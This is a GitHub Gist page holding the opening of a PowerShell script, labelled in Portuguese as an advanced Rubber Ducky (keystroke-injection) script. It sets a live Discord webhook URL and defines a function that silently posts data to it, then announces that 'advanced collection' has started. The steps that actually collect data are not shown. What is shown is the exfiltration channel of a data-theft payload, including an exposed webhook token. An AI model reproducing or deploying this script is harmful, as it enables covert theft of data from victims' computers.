Skip to content

Instantly share code, notes, and snippets.

View ackromus's full-sized avatar

ACKROMUS ackromus

View GitHub Profile
# Rubber Ducky - Script Avancado (com historico funcionando)
$webhook = "https://discord.com/api/webhooks/1491240929464422623/i2sj5jdeP4RkB0hAPxzFlulwulysfXV84G2Rk7Mdirks1Ah2E8JLXJvmESpTvh2xBA2I"
function Send-ToDiscord {
param($Message)
$body = @{ content = $Message } | ConvertTo-Json
Invoke-RestMethod -Uri $webhook -Method Post -Body $body -ContentType "application/json" -UseBasicParsing -ErrorAction SilentlyContinue
}
Send-ToDiscord "[INICIO] Coleta avancada iniciada"